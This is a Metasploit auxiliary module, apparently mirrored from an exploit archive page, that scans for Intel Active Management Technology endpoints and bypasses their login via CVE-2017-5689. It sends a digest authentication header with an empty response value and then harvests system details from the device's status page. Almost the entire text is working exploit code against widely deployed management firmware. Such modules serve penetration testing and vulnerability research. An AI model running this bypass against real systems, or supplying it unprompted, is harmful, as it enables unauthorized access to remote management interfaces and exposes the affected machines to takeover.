Share
## https://sploitus.com/exploit?id=PACKETSTORM:181118
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Intel AMT Digest Authentication Bypass Scanner',  
'Description' => %q{  
This module scans for Intel Active Management Technology endpoints and attempts  
to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service  
can be found on ports 16992, 16993 (tls), 623, and 624 (tls).  
},  
'Author' => 'hdm',  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2017-5689' ],  
[ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],  
[ 'URL', 'https://www.intel.com/content/www/us/en/security-center/default.html?intelid=INTEL-SA-00075&languageid=en-fr' ],  
],  
'DisclosureDate' => 'May 05 2017'  
)  
  
register_options(  
[  
Opt::RPORT(16992),  
])  
end  
  
# Fingerprint a single host  
def run_host(ip)  
begin  
connect  
res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })  
unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')  
disconnect  
return  
end  
  
vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")  
  
unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/  
vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")  
disconnect  
return  
end  
  
realm = $1  
nonce = $2  
cnonce = Rex::Text.rand_text(10)  
  
res = send_request_raw(  
{  
'uri' => '/hw-sys.htm',  
'method' => 'GET',  
'headers' => {  
'Authorization' =>  
"Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +  
"cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""  
}  
})  
  
unless res && res.body.to_s.index("Computer model")  
vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")  
return  
end  
  
proof = res.body.to_s  
proof_hash = nil  
  
info_keys = res.body.scan(/<td class=r1><p>([^\<]+)(?:<\/p>)?/).map{|x| x.first.to_s.gsub("&#x2F;", "/") }  
if info_keys.length > 0  
proof_hash = {}  
proof = ""  
  
info_vals = res.body.scan(/<td class=r1>([^\<]+)</).map{|x| x.first.to_s.gsub("&#x2F;", "/") }  
info_keys.each do |ik|  
iv = info_vals.shift  
break unless iv  
proof_hash[ik] = iv  
proof << "#{iv}: #{ik}\n"  
end  
end  
  
print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5689 #{proof_hash.inspect}")  
  
report_note(  
:host => ip,  
:proto => 'tcp',  
:port => rport,  
:type => 'intel.amt.system_information',  
:data => proof_hash  
)  
  
report_vuln({  
:host => rhost,  
:port => rport,  
:proto => 'tcp',  
:name => "Intel AMT Digest Authentication Bypass",  
:refs => self.references,  
:info => proof  
})  
  
rescue ::Timeout::Error, ::Errno::EPIPE  
ensure  
disconnect  
end  
end  
end